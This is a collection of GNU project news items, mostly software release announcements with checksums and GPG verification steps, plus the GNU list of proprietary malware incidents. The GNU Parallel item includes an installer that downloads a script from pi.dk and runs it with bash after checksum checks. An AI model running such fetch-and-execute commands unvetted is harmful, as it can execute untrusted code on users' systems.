I have released parted 3.7 Here are the compressed sources and a GPG detached signature[*]:   https://ftp.gnu.o ... parted-3.7.tar.xz   https://ftp.gnu.o ... ed-3.7.tar.xz.sig Use a mirror for higher download bandwidth:   https://www.gnu ... g/prep/ftp.html Here are the SHA256 checksums: 008de57561a4f3c25a0648e66ed11e7b30be493889b64334a6d70f2c1951ef7b  parted-3.7.tar.xz de51773eef47a10db34ff2462f3b3c9d987d4bdb49420f0a22e1dda1ff897a5c  parted-3.7.tar.xz.sig [*] Use a .sig file to verify that the corresponding file (without the .sig suffix) is intact.  First, be sure to download both the .sig file and the corresponding tarball.  Then, run a command like this:   gpg --verify parted-3.7.tar.xz.sig If that command fails because you don't have the required public key, or that public key has expired, try the following commands to update or refresh it, and then rerun the 'gpg --verify' command.   gpg --locate-external-key bcl@redhat.com   gpg --recv-keys 117E8C168EFE3A7F   wget -q -O- 'https://savannah. ... ed&download=1' | gpg --import - This release was bootstrapped with the following tools:   Autoconf 2.72   Automake 1.17   Gettext 0.23.1   Gnulib commit 4e11e3d07a79a49eaa9b155c43801bbc1e5bd86e   Gperf 3.1 NEWS Noteworthy changes in release 3.7 (2026-04-08) [stable]   Promoting alpha release to stable release 3.7 Noteworthy changes in release 3.6.37 (2026-03-24) [alpha] ** New Features    hurd: Support USB device names ** Bug Fixes    Stop adding boot code into the MBR if it's zero when updating an    existing msdos partition table.    disk.c: Update metadata after reading partition table    Fix initialization of atr_c_locale inside PED_ASSERT    nilfs2: Fixed possible sigsegv in case of corrupted superblock    libparted: Do not detect ext4 without journal as ext2    libparted: Fix dvh disklabel unhandled exception    libparted: Fix sun disklabel unhandled exception    parted: fix do_version declaration to work with gcc 15    libparted: Fail early when detecting nilfs2    doc: Document IEC unit behavior in the manpage    parted: Print the Fixing... message to stderr    docs: Finish setup of libparted API docs    libparted: link libparted-fs-resize.so to libuuid

Dear community I'm happy to announce the release of the gnuhealth-control version 5.0.3 This version fixes some dependency issues in the context of the the initial HIS instance creation. For more information about the GNU Health Control center, visit our documentation page at: https://docs.gnuh ... ontrolcenter.html Issues related to this release: https://codeberg. ... is-utils/issues/9

by Bohdan Potuzhnyi

From Arch: The old iptables-nft package name is replaced by iptables, and the legacy backend is available as iptables-legacy. When switching packages (among iptables-nft, iptables, iptables-legacy), check for .pacsave files in /etc/iptables/ and restore your rules if needed: /etc/iptables/iptables.rules.pacsave /etc/iptables/ip6tables.rules.pacsave Most setups should work unchanged, but users relying on uncommon xtables extensions or legacy-only behavior should test carefully and use iptables-legacy if required.

The initial injustice of proprietary software often leads to further injustices: malicious functionalities. The introduction of unjust techniques in nonfree software, such as back doors, DRM, tethering, and others, has become ever more frequent. Nowadays, it is standard practice. We at the GNU Project show examples of malware that has been introduced in a wide variety of products and dis-services people use everyday, and of companies that make use of these techniques. Here are our latest additions March 2026 Proprietary Interference Shake Shack requires users of its mobile app to sign away their right to sue the company if they order their meals from their phones. Potential Malware Meta has been granted a patent to use so-called “Artificial Intelligence” to impersonate human users in social media platforms, for example people who are inactive or dead. To cover itself from predictable controversies, Meta declared that it does not intend to use the technology in the context of those examples. How long before the “invention” is used to impersonate active, living people? February 2026 HP's Software is Malware HP has recently started pushing a spyware program called HPMediaNetwork.exe into users' computers exploiting a Windows universal back door via Windows Update. The software, which is designed to serve personalized pop-up advertisements on the user's screen, runs in the background to collect device and users' data that HP sells to advertising companies. The malfeature is implemented at both hardware and software levels, and opting out does not block ads entirely. Users can avoid this and other kinds of mistreatment by choosing hardware that comes with free specifications and designs, and by installing only free software in their computers. Microsoft's Software is Malware Microsoft is pushing Pretend Intelligence onto users of Windows, set up to be able to take real world actions on the user's behalf. This starts with a subset of enthusiasts but the company is probably planning to push it onto everyone. Since Windows 11, like several previous versions, has a universal back door enabling Microsoft to remotely change the system code, any limits the user specifies for what Microsoft can do to per (the user) are no more than requests. If you don't want to be messed with, you should not run Windows. Nonetheless, Microsoft might heed those requests. Warning: this article seems to ridicule the idea that users might use a feature to limit what the PI has access to on their own machines. Windows encrypts disks for “security,” but reports all the encryption keys to Microsoft so that the encryption doesn't provide real security. Once Microsoft has these keys, it can't refuse to give them to the FBI. However, for real security you need to be able to use your own choice of keys. Microsoft stops users from doing that. Malware in Mobile Devices OnePlus 13 and 15 smartphones shipping with ColorOS versions 16.0.3.500/.501/.503 implement an anti-rollback feature which physically renders the device unusable if the owner tries to modify the operating system running in it. At the time of writing the restriction affects only those two models and only ColorOS, but it is expected that the company may extend it to older models of the phone as well as to OxygenOS, the variant of the operating system installed on phones intended for the global market. January 2026 Google's Software is Malware Google has rolled out a new software app which allows employers to log all messages sent through the Rich Communication Services (a newer replacement for SMS messages) on company-owned phones provided to employees, amplifying the surveillance workers are subjected to. “Bossware” as it's called, explicitly requires nullifying user agency in favor of a third-party (the boss), and therefore requires proprietary software. Microsoft's Software is Malware Microsoft has, repeatedly, pushed software changes meant to make it harder for users to use a web browser different than Microsoft's. December 2025 Malware In Cars The software installed in electric buses manufactured by Yutong in China and exported to some European countries contains a back door that enables the company to remotely control and even deactivate the vehicles. November 2025 Proprietary Back Doors Universe Browser, tied to online gambling platforms in Asia and marketed as a “privacy browser,” installs various malicious functionalities in the user's computer. Proprietary Censorship Bowing down to the US government, Apple and Google removed from their stores several applications used for reporting ICE raids. Google even tried to justify it by calling ICE thugs a “vulnerable group,” despite them being the ones who carry the weapons. Proprietary Surveillance An app called ICEBlock tried to set up anonymous posting and anonymous access to data about where US deportation thugs are operating. It didn't keep records about who was using it—but Apple's own records would be enough to make them vulnerable to snooping by the US government to find who uses the app. Apple later removed ICEBlock from its store at the request of the US government.

GNU Parallel 20260322 ('این آخرین نبرده،') has been released. It is available for download at: lbry://@GnuParallel:4 Quote of the month:   i rly love gnu parallel over xargs, it's basically the same but has lots of useful and well documented options. sry if u know already     -- d@nny "disc@" mc² @hipsterelectron@circumstances.run New in this release: No new features. Bug fixes. GNU Parallel - For people who live life in the parallel lane. If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it. About GNU Parallel GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel. If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops. GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs. For example you can run this to convert all jpeg files into png and gif files and have a progress bar:   parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:   find . -name '*.jpg' |     parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200 You can find more about GNU Parallel at: http://www.gnu ... rg/s/parallel/ You can install GNU Parallel in just 10 seconds with:     $ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \        fetch -o - http://pi.dk/3 ) > install.sh     $ sha1sum install.sh | grep c555f616391c6f7c28bf938044f4ec50     12345678 c555f616 391c6f7c 28bf9380 44f4ec50     $ md5sum install.sh | grep 707275363428aa9e9a136b9a7296dfe4     70727536 3428aa9e 9a136b9a 7296dfe4     $ sha512sum install.sh | grep b24bfe249695e0236f6bc7de85828fe1f08f4259     83320d89 f56698ec 77454856 895edc3e aa16feab 2757966e 5092ef2d 661b8b45     b24bfe24 9695e023 6f6bc7de 85828fe1 f08f4259 6ce5480a 5e1571b2 8b722f21     $ bash install.sh Watch the intro video on http://www.youtub ... L284C9FF2488BC6D1 Walk through the tutorial (man parallel_tutorial). Your command line will love you for it. When using programs that use GNU Parallel to process data for publication please cite: O. Tange (2018): GNU Parallel 2018, March 2018, https://doi.org/1 ... 81/zenodo.1146014. If you like GNU Parallel: Give a demo at your local user group/team/colleagues Post the intro videos on Reddit/Diaspora*/forums/blogs/ Identi.ca/Google+/Twitter/Facebook/Linkedin/mailing lists Get the merchandise https://gnuparall ... igns/gnu-parallel Request or write a review for your favourite blog or magazine Request or build a package for your favourite distribution (if it is not already there) Invite me for your next conference If you use programs that use GNU Parallel for research: Please cite GNU Parallel in you publications (use --citation) If GNU Parallel saves you money: (Have your company) donate to FSF https://my.f ... .org/donate/ About GNU SQL GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries. The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell. When using GNU SQL for a publication please cite: O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32. About GNU Niceload GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.

https://www.smart ... com/lp/management This offering sure looks like GNU remotecontrol. Perhaps it is our code.

We are happy to announce the release of GNU Taler v1.5.

Autoconf 2.72 has been released, see the release announcement: https://lists.gnu ... -03/msg00000.html

A major bugfix release. Complete rewrite of the decompressor to fix hairy section reading bugs in some big files. Fixed many dxf roundtrips. See https://www.gnu.o ... oftware/libredwg/ and https://github.co ... /blob/0.13.4/NEWS Here are the compressed sources: http://ftp.gnu.or ... dwg-0.13.4.tar.gz (21MB) http://ftp.gnu.or ... dwg-0.13.4.tar.xz (11MB) Here are the GPG detached signatures[*]: http://ftp.gnu.or ... 0.13.4.tar.gz.sig http://ftp.gnu.or ... 0.13.4.tar.xz.sig Use a mirror for higher download bandwidth: https://www.gnu.o ... rg/order/ftp.html Here are more binaries: https://github.co ... leases/tag/0.13.4 Here are the SHA256 checksums: cacff5510f46723462e854e15ecfa97cbc7475acb3eb7ae1ca6e4193ecc2267d  libredwg-0.13.4.tar.gz 7e153ea4dac4cbf3dc9c50b9ef7a5604e09cdd4c5520bcf8017877bbe1422cd5  libredwg-0.13.4.tar.xz cb46bce034296e91cb1a982cd53ec1928b11f4f7f70512dd21513a27959688b5  libredwg-0.13.4-win64.zip Please ignore the broken Source code (tar.gz, .zip) artefacts. They cannot be deleted. [*] Use a .sig file to verify that the corresponding file (without the .sig suffix) is intact. First, be sure to download both the .sig file and the corresponding tarball. Then, run a command like this: gpg --verify libredwg-0.13.4.tar.gz.sig If that command fails because you don't have the required public key, then run this command to import it: gpg --recv-keys B4F63339E65D6414 and rerun the gpg --verify command.

GNUnet 0.27.0 released We are pleased to announce the release of GNUnet 0.27.0. GNUnet is an alternative network stack for building secure, decentralized and privacy-preserving distributed applications. Our goal is to replace the old insecure Internet protocol stack. Starting from an application for secure publication of files, it has grown to include all kinds of basic protocol components and applications towards the creation of a GNU internet. This is a new major release. Major versions may break protocol compatibility with the 0.26.X versions. Please be aware that Git master is thus henceforth (and has been for a while) INCOMPATIBLE with the 0.26.X GNUnet network, and interactions between old and new peers will result in issues. In terms of usability, users should be aware that there are still a number of known open issues in particular with respect to ease of use, but also some critical privacy issues especially for mobile users. Also, the nascent network is tiny and thus unlikely to provide good anonymity or extensive amounts of interesting information. As a result, the 0.27.0 release is still only suitable for early adopters with some reasonable pain tolerance . Download links gnunet-0.27.0.tar.gz ( signature ) gnunet-fuse-0.27.0.tar.gz ( signature ) The GPG key used to sign is: 3D11063C10F98D14BD24D1470B0998EF86F59B6A Note that due to mirror synchronization, not all links might be functional early after the release. For direct access try http://ftp.gnu.org/gnu/gnunet/ Changes A detailed list of changes can be found in the git log, the NEWS. Known Issues There are known major issues with the TRANSPORT subsystem. There are known moderate implementation limitations in CADET that negatively impact performance. There are known moderate design issues in FS that also impact usability and performance. There are minor implementation limitations in SET that create unnecessary attack surface for availability. The RPS subsystem remains experimental. In addition to this list, you may also want to consult our bug tracker at bugs.gnunet.org which lists about 190 more specific issues. Thanks This release was the work of many people. The following people contributed code and were thus easily identified: Christian Grothoff, Florian Dold, TheJackiMonster, and Martin Schanzenbach.

This is to announce hello-2.12.3, a stable release. GNU hello is a demonstration and model of the GNU coding standards for hackers, and a simple example for users. There have been 18 commits by 2 people in the 43 weeks since 2.12.2. See the NEWS below for a brief summary. Thanks to everyone who has contributed! The following people contributed changes to this release:   Collin Funk (16)   Reuben Thomas (2) Collin  [on behalf of the hello maintainers] ================================================================== Here is the GNU hello home page:     https://gnu.org/s/hello/ Here are the compressed sources and a GPG detached signature:   https://ftpmirror.gnu.org/hello/hello-2.12.3.tar.gz   https://ftpmirror.gnu.org/hello/hello-2.12.3.tar.gz.sig Use a mirror for higher download bandwidth:   https://www.gnu.org/order/ftp.html Here are the SHA256 and SHA3-256 checksums:   SHA256 (hello-2.12.3.tar.gz) = DV9gFUOC/uELEUocNOeF2LH0kgc64tOm97FHaHs2aqA=   SHA3-256 (hello-2.12.3.tar.gz) = VQz4Y71rvDa2iSh59ZUTHiT0wJmFWKo4VcUvpkRi4Ek= Verify the base64 SHA256 checksum with 'cksum -a sha256 --check' from coreutils-9.2 or OpenBSD's cksum since 2007. Verify the base64 SHA3-256 checksum with 'cksum -a sha3 --check' from coreutils-9.8. Use a .sig file to verify that the corresponding file (without the .sig suffix) is intact.  First, be sure to download both the .sig file and the corresponding tarball.  Then, run a command like this:   gpg --verify hello-2.12.3.tar.gz.sig The signature should match the fingerprint of the following key:   pub   rsa4096/8CE6491AE30D7D75 2024-03-11 [SC]         Key fingerprint = 2371 1855 08D1 317B D578  E5CC 8CE6 491A E30D 7D75   uid                 [ultimate] Collin Funk <collin.funk1@gmail.com> If that command fails because you don't have the required public key, or that public key has expired, try the following commands to retrieve or refresh it, and then rerun the 'gpg --verify' command.   gpg --locate-external-key collin.funk1@gmail.com   gpg --recv-keys 8CE6491AE30D7D75   wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=hello&download=1' | gpg --import - As a last resort to find the key, you can try the official GNU keyring:   wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg   gpg --keyring gnu-keyring.gpg --verify hello-2.12.3.tar.gz.sig This release is based on the hello git repository, available as   git clone https://https.git.savannah.gnu.org/git/hello.git with commit 89fff19b23e35f0e97072507685c92aaae3d04c7 tagged as v2.12.3. For a summary of changes and contributors, see:   https://gitweb.git.savannah.gnu.org/gitweb/?p=hello.git;a=shortlog;h=v2.12.3 or run this command from a git-cloned hello directory:   git shortlog v2.12.2..v2.12.3 This release was bootstrapped with the following tools:   Autoconf 2.72   Automake 1.18.1   Gnulib 2026-03-16 4e11e3d07a79a49eaa9b155c43801bbc1e5bd86e NEWS * Noteworthy changes in release 2.12.3 (2026-03-17) [stable] The manual no longer mentions the -h and -v short options which were removed in release 2.11. Update gnulib for compatibility with glibc-2.43. GNU hello no longer fails to build with BSD implementations of the 'make' command.  Previously they would be unable to find a target listed as a dependency of the 'hello' program.

Hello everyone, We are pleased to announce the release of TeXmacs version 2.1.5 This version uses Qt6 by default, supports very high-definition displays, and introduces new ongoing collaborative editing features. On Windows, TeXmacs is now available on the Microsoft Store. On Linux, we have a new Qt6 AppImage that maximizes compatibility with GNU Linux distributions. On Mac, we have new universal packages. - Download for Windows: https://www.texma ... d/windows.en.html - Download for macOS: https://www.texma ... ad/macosx.en.html - Download for GNU Linux: https://www.texma ... oad/linux.en.html Happy writing with TeXmacs! The TeXmacs Team

13 March 2026 Unifont 17.0.04 is now available.  This is a minor release aligned with Unicode 17.0.0. This release notably includes separate BDF, PCF, and OpenType font files with 28,000+ Unicode T-source Chinese glyphs created by Kusanagi_Sans and Kao Chen-tung (高振東) in font files beginning with "unifont_t".  Many other Chinese glyphs have been added.  Also, font/Makefile has been reorganized for more efficient font file building.  See the ChangeLog file for details. Download this release from GNU server mirrors at:      https://ftpmirror ... /unifont-17.0.04/ or if that fails,      https://ftp.gnu.o ... /unifont-17.0.04/ or, as a last resort,      ftp://ftp.gnu.org ... /unifont-17.0.04/ These files are also available on the unifoundry.com website:      https://unifoundr ... /unifont-17.0.04/ Font files are in the subdirectory      https://unifoundr ... 0.04/font-builds/ A more detailed description of font changes is available at       https://unifoundr ... nifont/index.html and of utility program changes at       https://unifoundr ... nt-utilities.html Information about Hangul modifications is at       https://unifoundr ... hangul/index.html and       http://unifoundry ... l-generation.html Enjoy! Paul Hardy GNU Unifont Maintainer

The Free Software Foundation (FSF), a Massachusetts 501(c)(3) charity with a worldwide mission to promote computer user freedom, seeks a motivated and talented individual to be our new Engineering and Certification Manager. This position is ideally full-time and US-based, but exceptions can be made for a qualified candidate.

I'm very pleased to announce the release of a new version of GNU PSPP.  PSPP is a program for statistical analysis of sampled data.  It is a free replacement for the proprietary program SPSS. Changes from 2.1.0 to 2.1.1: Translation updates. Bug fixes in build system and tests. No longer mistakenly labeled as a "test release". Please send PSPP bug reports to bug-gnu-pspp@gnu.org.

I'm very pleased to announce the release of a new version of GNU PSPP.  PSPP is a program for statistical analysis of sampled data.  It is a free replacement for the proprietary program SPSS. Changes from 2.0.1 to 2.1.0: Bug fixes. Translation updates. Please send PSPP bug reports to bug-gnu-pspp@gnu.org.